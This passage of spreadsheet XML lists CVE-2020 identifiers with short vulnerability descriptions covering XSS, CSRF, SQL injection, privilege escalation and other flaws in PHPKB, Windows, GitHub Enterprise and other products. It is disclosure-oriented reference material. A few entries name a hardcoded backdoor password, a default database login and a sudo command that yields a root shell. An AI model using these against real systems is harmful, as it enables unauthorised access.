    <t>CVE-2020-10465</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-category.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
    <t>CVE-2020-10466</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
    <t>CVE-2020-10467</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-comment.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
    <t>CVE-2020-10468</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
    <t>CVE-2020-10469</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-departments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-1047</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka 'Windows Hyper-V Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1080.</t>
  </si>
  <si>
    <t>CVE-2020-10470</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-fields.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10471</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-articles.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10472</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-templates.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10473</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-categories.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10474</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10475</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-tickets.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10476</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10477</t>
  </si>
  <si>
    <t>Reflected XSS in admin/manage-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.</t>
  </si>
  <si>
    <t>CVE-2020-10478</t>
  </si>
  <si>
    <t>CSRF in admin/manage-settings.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to change the global settings, potentially gaining code execution or causing a denial of service, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10479</t>
  </si>
  <si>
    <t>CSRF in admin/add-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new news article via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-1048</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1070.</t>
  </si>
  <si>
    <t>CVE-2020-10480</t>
  </si>
  <si>
    <t>CSRF in admin/add-category.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new category via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10481</t>
  </si>
  <si>
    <t>CSRF in admin/add-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new glossary term via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10482</t>
  </si>
  <si>
    <t>CSRF in admin/add-template.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new article template via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10483</t>
  </si>
  <si>
    <t>CSRF in admin/ajax-hub.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to post a comment on any article via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10484</t>
  </si>
  <si>
    <t>CSRF in admin/add-field.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to create a custom field via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10485</t>
  </si>
  <si>
    <t>CSRF in admin/manage-articles.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete an article via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10486</t>
  </si>
  <si>
    <t>CSRF in admin/manage-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a comment via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10487</t>
  </si>
  <si>
    <t>CSRF in admin/manage-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a glossary term via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10488</t>
  </si>
  <si>
    <t>CSRF in admin/manage-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a news article via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10489</t>
  </si>
  <si>
    <t>CSRF in admin/manage-tickets.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a ticket via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-1049</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-1050.</t>
  </si>
  <si>
    <t>CVE-2020-10490</t>
  </si>
  <si>
    <t>CSRF in admin/manage-departments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a department via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10491</t>
  </si>
  <si>
    <t>CSRF in admin/manage-departments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a department via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10492</t>
  </si>
  <si>
    <t>CSRF in admin/manage-templates.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete an article template via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10493</t>
  </si>
  <si>
    <t>CSRF in admin/edit-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit a glossary term, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10494</t>
  </si>
  <si>
    <t>CSRF in admin/edit-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit a news article, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10495</t>
  </si>
  <si>
    <t>CSRF in admin/edit-template.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit an article template, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10496</t>
  </si>
  <si>
    <t>CSRF in admin/edit-article.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit an article, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10497</t>
  </si>
  <si>
    <t>CSRF in admin/manage-categories.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a category via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10498</t>
  </si>
  <si>
    <t>CSRF in admin/edit-category.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit a category, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10499</t>
  </si>
  <si>
    <t>CSRF in admin/manage-tickets.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to close any ticket, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-1050</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-1049.</t>
  </si>
  <si>
    <t>CVE-2020-10500</t>
  </si>
  <si>
    <t>CSRF in admin/reply-ticket.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to reply to any ticket, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10501</t>
  </si>
  <si>
    <t>CSRF in admin/manage-departments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit a department, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10502</t>
  </si>
  <si>
    <t>CSRF in admin/manage-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to approve any comment, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10503</t>
  </si>
  <si>
    <t>CSRF in admin/manage-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to disapprove any comment, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10504</t>
  </si>
  <si>
    <t>CSRF in admin/edit-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit a comment, given the id, via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-10505</t>
  </si>
  <si>
    <t>The School Manage System before 2020, developed by ALLE INFORMATION CO., LTD., contains a vulnerability of SQL Injection, an attacker can use a union based injection query string to get databases schema and username/password.</t>
  </si>
  <si>
    <t>CVE-2020-10506</t>
  </si>
  <si>
    <t>The School Manage System before 2020, developed by ALLE INFORMATION CO., LTD., contains a vulnerability of Path Traversal, allowing attackers to access arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-10507</t>
  </si>
  <si>
    <t>The School Manage System before 2020, developed by ALLE INFORMATION CO., LTD., contains a vulnerability of Unrestricted file upload (RCE) , that would allow attackers to gain access in the hosting machine.</t>
  </si>
  <si>
    <t>CVE-2020-10508</t>
  </si>
  <si>
    <t>Sunnet eHRD, a human training and development management system, improperly stores system files. Attackers can use a specific URL and capture confidential information.</t>
  </si>
  <si>
    <t>CVE-2020-10509</t>
  </si>
  <si>
    <t>Sunnet eHRD, a human training and development management system, contains vulnerability of Cross-Site Scripting (XSS), attackers can inject arbitrary command into the system and launch XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-1051</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1174, CVE-2020-1175, CVE-2020-1176.</t>
  </si>
  <si>
    <t>CVE-2020-10510</t>
  </si>
  <si>
    <t>Sunnet eHRD, a human training and development management system, contains a vulnerability of Broken Access Control. After login, attackers can use a specific URL, access unauthorized functionality and data.</t>
  </si>
  <si>
    <t>CVE-2020-10511</t>
  </si>
  <si>
    <t>HGiga C&amp;Cmail CCMAILQ before olln-base-6.0-418.i386.rpm and CCMAILN before olln-base-5.0-418.i386.rpm contains insecure configurations. Attackers can exploit these flaws to access unauthorized functionality via a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-10512</t>
  </si>
  <si>
    <t>HGiga C&amp;Cmail CCMAILQ before olln-calendar-6.0-100.i386.rpm and CCMAILN before olln-calendar-5.0-100.i386.rpm contains a SQL Injection vulnerability which allows attackers to injecting SQL commands in the URL parameter to execute unauthorized commands.</t>
  </si>
  <si>
    <t>CVE-2020-10513</t>
  </si>
  <si>
    <t>The file management interface of iCatch DVR firmware before 20200103 contains broken access control which allows the attacker to remotely manipulate arbitrary file.</t>
  </si>
  <si>
    <t>CVE-2020-10514</t>
  </si>
  <si>
    <t>iCatch DVR firmware before 20200103 do not validate function parameter properly, resulting attackers executing arbitrary command.</t>
  </si>
  <si>
    <t>CVE-2020-10515</t>
  </si>
  <si>
    <t>STARFACE UCC Client before 6.7.1.204 on WIndows allows binary planting to execute code with System rights, aka usd-2020-0006.</t>
  </si>
  <si>
    <t>CVE-2020-10516</t>
  </si>
  <si>
    <t>An improper access control vulnerability was identified in the GitHub Enterprise Server API that allowed an organization member to escalate permissions and gain access to unauthorized repositories within an organization. This vulnerability affected all versions of GitHub Enterprise Server prior to 2.21 and was fixed in 2.20.9, 2.19.15, and 2.18.20. This vulnerability was reported via the GitHub Bug Bounty program.</t>
  </si>
  <si>
    <t>CVE-2020-10517</t>
  </si>
  <si>
    <t>An improper access control vulnerability was identified in GitHub Enterprise Server that allowed authenticated users of the instance to determine the names of unauthorized private repositories given their numerical IDs. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected all versions of GitHub Enterprise Server prior to 2.22 and was fixed in versions 2.21.6, 2.20.15, and 2.19.21. This vulnerability was reported via the GitHub Bug Bounty program.</t>
  </si>
  <si>
    <t>CVE-2020-10518</t>
  </si>
  <si>
    <t>A remote code execution vulnerability was identified in GitHub Enterprise Server that could be exploited when building a GitHub Pages site. User-controlled configuration of the underlying parsers used by GitHub Pages were not sufficiently restricted and made it possible to execute commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 2.22 and was fixed in 2.21.6, 2.20.15, and 2.19.21. The underlying issues contributing to this vulnerability were identified both internally and through the GitHub Security Bug Bounty program.</t>
  </si>
  <si>
    <t>CVE-2020-10519</t>
  </si>
  <si>
    <t>A remote code execution vulnerability was identified in GitHub Enterprise Server that could be exploited when building a GitHub Pages site. User-controlled configuration of the underlying parsers used by GitHub Pages were not sufficiently restricted and made it possible to execute commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 2.22.7 and was fixed in 2.22.7, 2.21.15, and 2.20.24. The underlying issues contributing to this vulnerability were identified through the GitHub Security Bug Bounty program.</t>
  </si>
  <si>
    <t>CVE-2020-1052</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the ssdpsrv.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1159, CVE-2020-1376.</t>
  </si>
  <si>
    <t>CVE-2020-1053</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1308.</t>
  </si>
  <si>
    <t>CVE-2020-10531</t>
  </si>
  <si>
    <t>An issue was discovered in International Components for Unicode (ICU) for C/C++ through 66.1. An integer overflow, leading to a heap-based buffer overflow, exists in the UnicodeString::doAppend() function in common/unistr.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-10532</t>
  </si>
  <si>
    <t>The AD Helper component in WatchGuard Fireware before 5.8.5.10317 allows remote attackers to discover cleartext passwords via the /domains/list URI.</t>
  </si>
  <si>
    <t>CVE-2020-10534</t>
  </si>
  <si>
    <t>In the GlobalBlocking extension before 2020-03-10 for MediaWiki through 1.34.0, an issue related to IP range evaluation resulted in blocked users re-gaining escalated privileges. This is related to the case in which an IP address is contained in two ranges, one of which is locally disabled.</t>
  </si>
  <si>
    <t>CVE-2020-10535</t>
  </si>
  <si>
    <t>GitLab 12.8.x before 12.8.6, when sign-up is enabled, allows remote attackers to bypass email domain restrictions within the two-day grace period for an unconfirmed email address.</t>
  </si>
  <si>
    <t>CVE-2020-10537</t>
  </si>
  <si>
    <t>An issue was discovered in Epikur before 20.1.1. A Glassfish 4.1 server with a default configuration is running on TCP port 4848. No password is required to access it with the administrator account.</t>
  </si>
  <si>
    <t>CVE-2020-10538</t>
  </si>
  <si>
    <t>An issue was discovered in Epikur before 20.1.1. It stores the secret passwords of the users as MD5 hashes in the database. MD5 can be brute-forced efficiently and should not be used for such purposes. Additionally, since no salt is used, rainbow tables can speed up the attack.</t>
  </si>
  <si>
    <t>CVE-2020-10539</t>
  </si>
  <si>
    <t>An issue was discovered in Epikur before 20.1.1. The Epikur server contains the checkPasswort() function that, upon user login, checks the submitted password against the user password's MD5 hash stored in the database. It is also compared to a second MD5 hash, which is the same for every user (aka a "Backdoor Password" of 3p1kursupport). If the submitted password matches either one, access is granted.</t>
  </si>
  <si>
    <t>CVE-2020-1054</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.</t>
  </si>
  <si>
    <t>CVE-2020-10540</t>
  </si>
  <si>
    <t>Untis WebUntis before 2020.9.6 allows CSRF for certain combinations of rights and modules.</t>
  </si>
  <si>
    <t>CVE-2020-10541</t>
  </si>
  <si>
    <t>Zoho ManageEngine OpManager before 12.4.179 allows remote code execution via a specially crafted Mail Server Settings v1 API request. This was fixed in 12.5.108.</t>
  </si>
  <si>
    <t>CVE-2020-10543</t>
  </si>
  <si>
    <t>Perl before 5.30.3 on 32-bit platforms allows a heap-based buffer overflow because nested regular expression quantifiers have an integer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-10544</t>
  </si>
  <si>
    <t>An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces 7.0.11. In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.</t>
  </si>
  <si>
    <t>CVE-2020-10546</t>
  </si>
  <si>
    <t>rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.</t>
  </si>
  <si>
    <t>CVE-2020-10547</t>
  </si>
  <si>
    <t>rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.</t>
  </si>
  <si>
    <t>CVE-2020-10548</t>
  </si>
  <si>
    <t>rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.</t>
  </si>
  <si>
    <t>CVE-2020-10549</t>
  </si>
  <si>
    <t>rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.</t>
  </si>
  <si>
    <t>CVE-2020-1055</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Active Directory Federation Services (ADFS) does not properly sanitize user inputs, aka 'Microsoft Active Directory Federation Services Cross-Site Scripting Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10551</t>
  </si>
  <si>
    <t>QQBrowser before 10.5.3870.400 installs a Windows service TsService.exe. This file is writable by anyone belonging to the NT AUTHORITY\Authenticated Users group, which includes all local and remote users. This can be abused by local attackers to escalate privileges to NT AUTHORITY\SYSTEM by writing a malicious executable to the location of TsService.</t>
  </si>
  <si>
    <t>CVE-2020-10552</t>
  </si>
  <si>
    <t>An issue was discovered in Psyprax before 3.2.2. The Firebird database is accessible with the default user sysdba and password masterke after installation. This allows any user to access it and read and modify the contents, including passwords. Local database files can be accessed directly as well.</t>
  </si>
  <si>
    <t>CVE-2020-10553</t>
  </si>
  <si>
    <t>An issue was discovered in Psyprax before 3.2.2. The file %PROGRAMDATA%\Psyprax32\PPScreen.ini contains a hash for the lockscreen (aka screensaver) of the application. If that entry is removed, the lockscreen is no longer displayed and the app is no longer locked. All local users are able to modify that file.</t>
  </si>
  <si>
    <t>CVE-2020-10554</t>
  </si>
  <si>
    <t>An issue was discovered in Psyprax beforee 3.2.2. Passwords used to encrypt the data are stored in the database in an obfuscated format, which can be easily reverted. For example, the password AAAAAAAA is stored in the database as MMMMMMMM.</t>
  </si>
  <si>
    <t>CVE-2020-10557</t>
  </si>
  <si>
    <t>An issue was discovered in AContent through 1.4. It allows the user to run commands on the server with a low-privileged account. The upload section in the file manager page contains an arbitrary file upload vulnerability via upload.php. The extension .php7 bypasses file upload restrictions.</t>
  </si>
  <si>
    <t>CVE-2020-10558</t>
  </si>
  <si>
    <t>The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other miscellaneous functions from the main screen.</t>
  </si>
  <si>
    <t>CVE-2020-1056</t>
  </si>
  <si>
    <t>CVE-2020-10560</t>
  </si>
  <si>
    <t>An issue was discovered in Open Source Social Network (OSSN) through 5.3. A user-controlled file path with a weak cryptographic rand() can be used to read any file with the permissions of the webserver. This can lead to further compromise. The attacker must conduct a brute-force attack against the SiteKey to insert into a crafted URL for components/OssnComments/ossn_com.php and/or libraries/ossn.lib.upgrade.php.</t>
  </si>
  <si>
    <t>CVE-2020-10561</t>
  </si>
  <si>
    <t>An issue was discovered on Xiaomi Mi Jia ink-jet printer &lt; 3.4.6_0138. Injecting parameters to ippserver through the web management background, resulting in command execution vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-10562</t>
  </si>
  <si>
    <t>An issue was discovered in DEVOME GRR before 3.4.1c. admin_edit_room.php mishandles file uploads.</t>
  </si>
  <si>
    <t>CVE-2020-10563</t>
  </si>
  <si>
    <t>An issue was discovered in DEVOME GRR before 3.4.1c. frmcontactlist.php mishandles a SQL query.</t>
  </si>
  <si>
    <t>CVE-2020-10564</t>
  </si>
  <si>
    <t>An issue was discovered in the File Upload plugin before 4.13.0 for WordPress. A directory traversal can lead to remote code execution by uploading a crafted txt file into the lib directory, because of a wfu_include_lib call.</t>
  </si>
  <si>
    <t>CVE-2020-10565</t>
  </si>
  <si>
    <t>grub2-bhyve, as used in FreeBSD bhyve before revision 525916 2020-02-12, does not validate the address provided as part of a memrw command (read_* or write_*) by a guest through a grub2.cfg file. This allows an untrusted guest to perform arbitrary read or write operations in the context of the grub-bhyve process, resulting in code execution as root on the host OS.</t>
  </si>
  <si>
    <t>CVE-2020-10566</t>
  </si>
  <si>
    <t>grub2-bhyve, as used in FreeBSD bhyve before revision 525916 2020-02-12, mishandles font loading by a guest through a grub2.cfg file, leading to a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-10567</t>
  </si>
  <si>
    <t>An issue was discovered in Responsive Filemanager through 9.14.0. In the ajax_calls.php file in the save_img action in the name parameter, there is no validation of what kind of extension is sent. This makes it possible to execute PHP code if a legitimate JPEG image contains this code in the EXIF data, and the .php extension is used in the name parameter. (A potential fast patch is to disable the save_img action in the config file.)</t>
  </si>
  <si>
    <t>CVE-2020-10568</t>
  </si>
  <si>
    <t>The sitepress-multilingual-cms (WPML) plugin before 4.3.7-b.2 for WordPress has CSRF due to a loose comparison. This leads to remote code execution in includes/class-wp-installer.php via a series of requests that leverage unintended comparisons of integers to strings.</t>
  </si>
  <si>
    <t>CVE-2020-10569</t>
  </si>
  <si>
    <t>** DISPUTED ** SysAid On-Premise 20.1.11, by default, allows the AJP protocol port, which is vulnerable to a GhostCat attack. Additionally, it allows unauthenticated access to upload files, which can be used to execute commands on the system by chaining it with a GhostCat attack. NOTE: This may be a duplicate of CVE-2020-1938.</t>
  </si>
  <si>
    <t>CVE-2020-1057</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1172, CVE-2020-1180.</t>
  </si>
  <si>
    <t>CVE-2020-10570</t>
  </si>
  <si>
    <t>The Telegram application through 5.12 for Android, when Show Popup is enabled, might allow physically proximate attackers to bypass intended restrictions on message reading and message replying. This might be interpreted as a bypass of the passcode feature.</t>
  </si>
  <si>
    <t>CVE-2020-10571</t>
  </si>
  <si>
    <t>An issue was discovered in psd-tools before 1.9.4. The Cython implementation of RLE decoding did not check for malicious data.</t>
  </si>
  <si>
    <t>CVE-2020-10573</t>
  </si>
  <si>
    <t>An issue was discovered in Janus through 0.9.1. janus_audiobridge.c has a double mutex unlock when listing private rooms in AudioBridge.</t>
  </si>
  <si>
    <t>CVE-2020-10574</t>
  </si>
  <si>
    <t>An issue was discovered in Janus through 0.9.1. janus.c tries to use a string that doesn't actually exist during a "query_logger" Admin API request, because of a typo in the JSON validation.</t>
  </si>
  <si>
    <t>CVE-2020-10575</t>
  </si>
  <si>
    <t>An issue was discovered in Janus through 0.9.1. plugins/janus_videocall.c in the VideoCall plugin mishandles session management because a race condition causes some references to be freed too early or too many times.</t>
  </si>
  <si>
    <t>CVE-2020-10576</t>
  </si>
  <si>
    <t>An issue was discovered in Janus through 0.9.1. plugins/janus_voicemail.c in the VoiceMail plugin has a race condition that could cause a server crash.</t>
  </si>
  <si>
    <t>CVE-2020-10577</t>
  </si>
  <si>
    <t>An issue was discovered in Janus through 0.9.1. janus.c has multiple concurrent threads that misuse the source property of a session, leading to a race condition when claiming sessions.</t>
  </si>
  <si>
    <t>CVE-2020-10578</t>
  </si>
  <si>
    <t>An arbitrary file read vulnerability exists in system/controller/backend/template.php in QCMS v3.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-10579</t>
  </si>
  <si>
    <t>A directory traversal on the /admin/sysmon.php script of Invigo Automatic Device Management (ADM) through 5.0 allows remote attackers to list the content of arbitrary server directories accessible to the user running the application.</t>
  </si>
  <si>
    <t>CVE-2020-1058</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1060, CVE-2020-1093.</t>
  </si>
  <si>
    <t>CVE-2020-10580</t>
  </si>
  <si>
    <t>A command injection on the /admin/broadcast.php script of Invigo Automatic Device Management (ADM) through 5.0 allows remote authenticated attackers to execute arbitrary PHP code on the server as the user running the application.</t>
  </si>
  <si>
    <t>CVE-2020-10581</t>
  </si>
  <si>
    <t>Multiple session validity check issues in several administration functionalities of Invigo Automatic Device Management (ADM) through 5.0 allow remote attackers to read potentially sensitive data hosted by the application.</t>
  </si>
  <si>
    <t>CVE-2020-10582</t>
  </si>
  <si>
    <t>A SQL injection on the /admin/display_errors.php script of Invigo Automatic Device Management (ADM) through 5.0 allows remote attackers to execute arbitrary SQL requests (including data reading and modification) on the database.</t>
  </si>
  <si>
    <t>CVE-2020-10583</t>
  </si>
  <si>
    <t>The /admin/admapi.php script of Invigo Automatic Device Management (ADM) through 5.0 allows remote authenticated attackers to execute arbitrary OS commands on the server as the user running the application.</t>
  </si>
  <si>
    <t>CVE-2020-10584</t>
  </si>
  <si>
    <t>A directory traversal on the /admin/search_by.php script of Invigo Automatic Device Management (ADM) through 5.0 allows remote attackers to read arbitrary server files accessible to the user running the application.</t>
  </si>
  <si>
    <t>CVE-2020-10587</t>
  </si>
  <si>
    <t>antiX and MX Linux allow local users to achieve root access via "persist-config --command /bin/sh" because of the Sudo configuration.</t>
  </si>
  <si>
    <t>CVE-2020-10588</t>
  </si>
  <si>
    <t>v2rayL 2.1.3 allows local users to achieve root access because /etc/v2rayL/add.sh and /etc/v2rayL/remove.sh are owned by a low-privileged user but execute as root via Sudo.</t>
  </si>
  <si>
    <t>CVE-2020-10589</t>
  </si>
  <si>
    <t>v2rayL 2.1.3 allows local users to achieve root access because /etc/v2rayL/config.json is owned by a low-privileged user but contains commands that are executed as root, after v2rayL.service is restarted via Sudo.</t>
  </si>
  <si>
    <t>CVE-2020-1059</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content, aka 'Microsoft Edge Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48539.txt</t>
  </si>
  <si>
    <t>OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)</t>
  </si>
  <si>
    <t>CVE-2020-10590</t>
  </si>
  <si>
    <t>Replicated Classic 2.x versions have an improperly secured API that exposes sensitive data from the Replicated Admin Console configuration. An attacker with network access to the Admin Console port (8800) on the Replicated Classic server could retrieve the TLS Keypair (Cert and Key) used to configure the Admin Console.</t>
  </si>
  <si>
    <t>CVE-2020-10591</t>
  </si>
  <si>
    <t>An issue was discovered in Walmart Labs Concord before 1.44.0. CORS Access-Control-Allow-Origin headers have a potentially unsafe dependency on Origin headers, and are not configurable. This allows remote attackers to discover host information, nodes, API metadata, and references to usernames via api/v1/apikey.</t>
  </si>
  <si>
    <t>CVE-2020-10592</t>
  </si>
  <si>
    <t>Tor before 0.3.5.10, 0.4.x before 0.4.1.9, and 0.4.2.x before 0.4.2.7 allows remote attackers to cause a Denial of Service (CPU consumption), aka TROVE-2020-002.</t>
  </si>
  <si>
    <t>CVE-2020-10593</t>
  </si>
  <si>
    <t>Tor before 0.3.5.10, 0.4.x before 0.4.1.9, and 0.4.2.x before 0.4.2.7 allows remote attackers to cause a Denial of Service (memory leak), aka TROVE-2020-004. This occurs in circpad_setup_machine_on_circ because a circuit-padding machine can be negotiated twice on the same circuit.</t>
  </si>
  <si>
    <t>CVE-2020-10594</t>
  </si>
  <si>
